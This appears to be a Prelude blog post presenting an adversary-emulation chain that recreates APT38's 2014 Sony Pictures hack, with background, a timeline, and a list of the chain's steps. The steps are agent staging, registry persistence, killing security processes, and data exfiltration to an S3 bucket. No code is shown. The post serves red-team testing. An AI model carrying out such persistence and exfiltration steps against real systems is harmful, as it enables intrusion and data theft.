APT38 Sony Hack

This chain will stage PneumaEX in the System32 directory, edit the registery for persistance of PneumaEX, kill GOP specific processes and services, compress and exfiltrate data to AWS S3, and open GOP extortion image. To execute this chain in its entirety, you must run your agent as Administrator. To stay true to the Sony attack, we suggest using a Windows executable agent and communicate over HTTP.

TTP Tuesday: APT38 - The Sony Hack

The Guardians of Peace: Persistence, Exfiltration, and Extortion

Theme Overview

Before August of 2014 not many people were aware of a movie called The Interview distributed by Sony Pictures, produced by Columbia Pictures (owned by Sony), and staring Seth Rogan and James Franco. The film depicts talk show host personality and his producer knowing that North Korean leader Kim Jong-Un is a fan of their show and asking for an interview with Kim. The CIA knowing the two were invited to North Korea request they help assassinate Kim while there. The duo goes through a wild ride into North Korea where they carry out their mission.

North Korea thought this movie was in poor taste calling it “the movie of terrorism”; they were clearly not happy about an American film depicting the assassination of their current leader. In November of 2014 the “Guardians of Peace” hacked the computer networks of Sony Pictures and leaked emails, employee records, and even several unreleased films. The Guardians of Peace extorted Sony by threatening further confidential company information releases if they went ahead and distributed the film and even threated attacks against theaters who would show it. This led to the cancellation of the film being shown in theaters and the film eventually releasing on Christmas Day (12/25/2014). This entire event would cause Sony to lose millions of dollars not just from the cost of The Interview, but from all of the other data that was released to the public.

Sony Hack Timeline

  • November 25, 2014 - First reports of the attack on Sony network
  • November 28, 2014 – Tech news report that North Korea is being investigated for the attack
  • November 29, 2014 - Copies of unreleased movies, believed to be rips of DVD screeners from Sony Pictures, appear on file sharing sites
  • December 1, 2014 - Documents released, revealing salaries of Sony Pictures executives
  • December 2, 2014 - Leaked documents reveal personal information of Sony employees and other internal Sony corporate documents (pay details, name, birth dates, social security information) to the public. FBI also releases warning about destructive malware called Destover.
  • December 3, 2014 – Reports claims that North Korea would be "officially named" behind the attacks
  • December 5, 2014 – Threatening emails sent to Sony Pictures employees; FBI confirms that they're investigating
  • December 6, 2014 – North Korea releases a statement calling the attack "righteous", but denies involvement
  • December 8, 2014 – Investigations reveal that the hackers used the high-speed network of a hotel in Bangkok, Thailand to leak confidential employee data to the Internet on December 2, 2014.
  • December 16, 2014 – Hackers sends threats of additional attacks, with references to Sept 11, 2001, if the movie The Interview was released.
  • December 17, 2014 – US officials conclude that North Korea ordered the cyber-attacks on Sony Pictures' computers. Theater chains announce they will not show the film, and Sony cancels the movie's release.
  • December 19, 2014 – FBI releases an official update on their investigation, concluding that the North Korean government was responsible for the attack.

APT38 Sony Chain

My main objective in building out this chain was to replicate at least some artifacts from the attack. The agent location and communication on the target machine is similar. The registry edits made on the target machine to provide agent persistence is exact and still work on fully updated Windows 10 machines. I have also included a TTP that kills processes that GOP would kill on the target. Many of these processes will not be applicable on most machines since they are related to Microsoft SQL, but these processes are interesting because it’s related to them messing with the databases. I then took a different approach to the exfiltration of data, adding a new way to perform exfiltration that can be utilized outside this chain. It’s a cloud-based exfiltration and I really like it because I believe it will be harder to detect from the user. Lastly, we use the GOP image opened in a web browser which is the same method used during the attack. The Guardians of Peace claimed they stayed resident on target machines for months pulling data when opportunity arise. This chain will allow you to stay resident on target and exfiltrate data to a safe location.

Thanks for reading! We’ll be back next week with more examples of APT38 tradecraft!

Watch a demonstration: APT38 Sony Hack

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!

There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu
Reddit: https://www.reddit.com/r/preludeorg/
Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: privateducky
Alex: khyberspache
Kris: Xanthonus
Octavia: VVX7
Sam: wasupwithuman

Source: https://feed.prelude.org
Read more

Execute this chain

Download Operator (1.7.1)
Learn about Operator


Stage PneumaEX
Install PneumaEX registry persistence
Kill security processes
Compress and stage documents directory
Install AWS CLI and exfiltrate file to S3 bucket
Ingress GOP image and open in Web Browser

User-Set Custom Variables

  • aws.accesskey: AKIA0123456787EXAMPLE
  • aws.password: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
  • aws.profile: MyNewProfile
  • aws.region: us-west-1
  • aws.s3.bucket: apt38-gop-stash